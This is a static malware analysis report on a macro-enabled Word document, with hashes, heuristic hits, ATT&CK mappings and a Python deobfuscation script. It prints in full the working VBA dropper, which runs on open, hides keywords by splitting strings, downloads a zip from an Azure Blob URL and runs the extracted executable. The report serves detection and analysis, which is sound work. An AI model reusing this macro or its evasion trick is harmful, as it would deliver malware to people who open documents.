Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5469b2f0ccd2f8f3…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 18.7 KB
Created: 2020-03-19 20:04:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-07-10
MD5: 7b8930b5bc8cf544520f78c3c3588bce
SHA-1: 63f23b9bf7b544f956fc568763e5ea27f10be7a4
SHA-256: 5469b2f0ccd2f8f3113d7d5db9a821fecca31d76890a94526f0bfbcf50699bab
Risk score: 306

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1071.001 Application Layer Protocol: Web Protocols
  • T1204.002 User Execution: Malicious File

The sample is a Word document (word/vbaProject.bin, ThisDocument module) carrying a VBA project whose AutoOpen subroutine runs the payload as soon as macros are enabled; a Workbook_Open subroutine calls the same entry point, but that is an Excel event name and never fires in a Word document. The macro first queries WMI (winmgmts:, Win32_Process) to check whether a process named crisol.exe is already running and exits if it is. Otherwise it reassembles, from short concatenated string fragments, the ProgIDs Microsoft.XMLHTTP and Adodb.Stream and the URL https://crisolfiles.blob.core.windows.net/crisolfiles/crisol.zip (an Azure Blob Storage host), saves the response body to %AppData%\crisol.zip, extracts the archive in place with Shell.Application CopyHere, and launches %AppData%\crisol.exe with the argument /G via Shell(). Every ProgID, path, URL and the WMI query text is split across string literals so that no single literal contains a scannable keyword. What crisol.exe does is outside the scope of this static analysis of the document; only the download, drop and execute chain is established here.

Heuristics (10)

  • VBA project inside OOXML [medium] OOXML_VBA
    Document contains a VBA project: VBA macros are present.
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
        Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper, even though the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        .write xHttp.responseBody
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API, ProgID or LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation serves no purpose other than evading keyword scanning. In this sample the technique is applied to the ProgIDs (Microsoft.XMLHTTP, Adodb.Stream, Shell.Application), the download URL, both dropped-file paths and the WMI query text.
    Matched line in script:
        Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
        Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP")
  • GetObject call [high] OLE_VBA_GETOBJ
    Matched line in script:
        Set objList = GetObject("winmgmts:") _
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open is an Excel event name; in this Word document it is dead code and AutoOpen is the effective entry point.
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Matched line in script:
        .savetofile Environ("Ap" & "pD" & "ata") & "\c" & "ris" & "ol.z" & "ip", 2 '//overwrite
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Caveat: every URL listed below is an XML namespace URI used by Word's document parts and Microsoft's drawing and chart extensions (schemas.microsoft.com, schemas.openxmlformats.org). None of them appears in the extracted macro source shown under Extracted artifacts, and none is a network indicator. The sample's only real network destination is assembled by the macro at run time from string fragments, so it never exists as a single literal that a URL extractor can pick up.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (Referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2016/ink (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2018/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (Referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2258 bytes
SHA-256: 1c5ef5eab978b5b0ab899acd842a1c5f4eefec1496d740787d308569689ecd52
Preview of the extracted script (the tool shows up to 1,000 lines; this module is shorter than that, so it is shown in full):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub dlf()
  Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP")
  Dim bStrm: Set bStrm = CreateObject("Ad" & "odb.Str" & "eam")
  xHttp.Open "GET", "ht" & "tps://cris" & "olfil" & "es.b" & "lob.c" & "ore." & "win" & "dows." & "net/cr" & "isolf" & "iles/" & "criso" & "l.zip", False
xHttp.Send

With bStrm
    .Type = 1 '//binary
    .Open
    .write xHttp.responseBody
    .savetofile Environ("Ap" & "pD" & "ata") & "\c" & "ris" & "ol.z" & "ip", 2 '//overwrite
End With
End Sub

Sub aop()

If Not ipr("crisol.exe") Then
        gdl
        Call UnZip(Environ("AppData"), Environ("Ap" & "pDa" & "ta") & "\c" & "ri" & "sol" & ".zi" & "p")
        Call sfwa
        End If
End Sub

Sub AutoOpen()
        aop
End Sub

Sub Workbook_Open()
        aop
End Sub


Sub gdl()
    dlf
End Sub

Sub UnZip(strTargetPath As String, Fname As Variant)
 
    Dim oApp As Object
 
    Dim FileNameFolder As Variant
 
 
 
    If Right(strTargetPath, 1) <> Application.PathSeparator Then
 
        strTargetPath = strTargetPath & Application.PathSeparator
 
    End If
 
 
 
    FileNameFolder = strTargetPath
 
 
 
    Set oApp = CreateObject("She" & "ll.Ap" & "plica" & "tion")
 
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H10&
 
End Sub


Sub sfwa()
    Dim strProgramName As String
    Dim strArgument As String

    strProgramName = Environ("AppData") & "\cr" & "" & "iso" & "l.e" & "xe"
    strArgument = "/G"

    Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub

Function ipr(process As String)
    Dim objList As Object

    Set objList = GetObject("winmgmts:") _
        .ExecQuery("sel" & "ect * fr" & "om win" & "32_pr" & "ocess wh" & "ere name='" & process & "'")

    If objList.Count > 0 Then
        ipr = True
    Else
        ipr = False
    End If

End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 14848 bytes
SHA-256: b9e8d6195597fc47fa1b002a5f5726e4cc4590fe590f51b3dd69c01ac195ef78
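The split-literal obfuscation flagged by OLE_VBA_SPLIT_KEYWORD_OBFUSCATION and OLE_VBA_HTTP_DROP_EXEC is mechanical, and undoing it is too. The following Python is an added example for this page, not code from the analysis service or from the oletools project: it merges adjacent quoted literals joined by &, rewrites Environ("X") as a "%X%" placeholder (a readability choice of this example, not VBA semantics), and runs the same naive keyword scan before and after so the effect of the obfuscation is visible. SAMPLE_VBA is an excerpt of the macro source printed in the artifact preview above, embedded here as constructed test input; the indicator list, the regular expressions and the function names are this example's own and not part of the report.

```python
"""Collapse VBA split-string obfuscation and rescan the result for indicators.

Added example for this report (not the analysis tool's code). It does what
the OLE_VBA_SPLIT_KEYWORD_OBFUSCATION heuristic describes in reverse: merge
literals joined with '&', resolve Environ("X") to a "%X%" placeholder (this
example's convention), then keyword-scan before and after.
"""
import re

# Excerpt of the macro printed in the report's artifact preview, embedded here
# as a constructed test input.
SAMPLE_VBA = r'''
Sub dlf()
  Dim xHttp: Set xHttp = CreateObject("Mi" & "croso" & "ft.XML" & "HTTP")
  Dim bStrm: Set bStrm = CreateObject("Ad" & "odb.Str" & "eam")
  xHttp.Open "GET", "ht" & "tps://cris" & "olfil" & "es.b" & "lob.c" & "ore." & "win" & "dows." & "net/cr" & "isolf" & "iles/" & "criso" & "l.zip", False
    .savetofile Environ("Ap" & "pD" & "ata") & "\c" & "ris" & "ol.z" & "ip", 2 '//overwrite
End Sub
Sub sfwa()
    strProgramName = Environ("AppData") & "\cr" & "" & "iso" & "l.e" & "xe"
    Call Shell("""" & strProgramName & """ """ & strArgument & """", vbNormalFocus)
End Sub
    Set oApp = CreateObject("She" & "ll.Ap" & "plica" & "tion")
    Set objList = GetObject("winmgmts:") _
        .ExecQuery("sel" & "ect * fr" & "om win" & "32_pr" & "ocess wh" & "ere name='" & process & "'")
'''

# One VBA string literal. VBA escapes a quote inside a literal by doubling it,
# so """" is the one-character string " and the Shell() line above must not be
# mis-tokenised into a run of empty literals.
LIT = r'"(?:[^"\n]|"")*"'
CONCAT = re.compile(rf'({LIT})\s*&\s*({LIT})')
ENVIRON = re.compile(rf'Environ\s*\(\s*({LIT})\s*\)', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
PATH_RE = re.compile(r'%\w+%\\[^"\s]+')

# Keywords a naive scanner looks for; VBA is case-insensitive, so the scan is too.
INDICATORS = ("Microsoft.XMLHTTP", "Adodb.Stream", "Shell.Application",
              "winmgmts:", "Win32_Process", "Shell(", "SaveToFile")


def collapse_concats(src: str) -> tuple[str, int]:
    """Merge every  "a" & "b"  into  "ab"  until nothing changes.

    Returns the rewritten source and the number of merges performed; the count
    is a usable obfuscation score, since benign macros rarely chain literals.
    """
    merges = 0
    while True:
        # group(1)[:-1] drops the first literal's closing quote,
        # group(2)[1:] drops the second literal's opening quote.
        src, n = CONCAT.subn(lambda m: m.group(1)[:-1] + m.group(2)[1:], src)
        if n == 0:
            return src, merges
        merges += n


def resolve_environ(src: str) -> str:
    """Rewrite Environ("AppData") as the literal "%AppData%" so that a further
    collapse pass yields complete, readable drop paths."""
    return ENVIRON.sub(lambda m: '"%' + m.group(1)[1:-1] + '%"', src)


def scan(src: str) -> list[str]:
    """Case-insensitive keyword scan; returns the indicators present, in order."""
    low = src.lower()
    return [k for k in INDICATORS if k.lower() in low]


def analyze(src: str) -> dict:
    """Deobfuscate and report what a keyword scanner sees before and after."""
    step1, n1 = collapse_concats(src)
    clean, n2 = collapse_concats(resolve_environ(step1))
    return {
        "before": scan(src),
        "after": scan(clean),
        "merges": n1 + n2,
        "urls": URL_RE.findall(clean),
        "paths": PATH_RE.findall(clean),
        "source": clean,
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_VBA)
    for key in ("before", "after", "merges", "urls", "paths"):
        print(f"{key:7}: {result[key]}")
    print(result["source"])
```

On the raw excerpt the scan sees only winmgmts:, Shell( and SaveToFile, the three names the author did not bother to split; on the collapsed source it sees all seven, and the URL and path extractors recover the Azure Blob download URL and both %AppData% file paths. The LIT pattern treats a doubled quote as VBA's escape, which is what keeps the Shell() line, with its """" literals, from being merged into nonsense; a scanner that simply strips quotes and joins on & would get that line wrong.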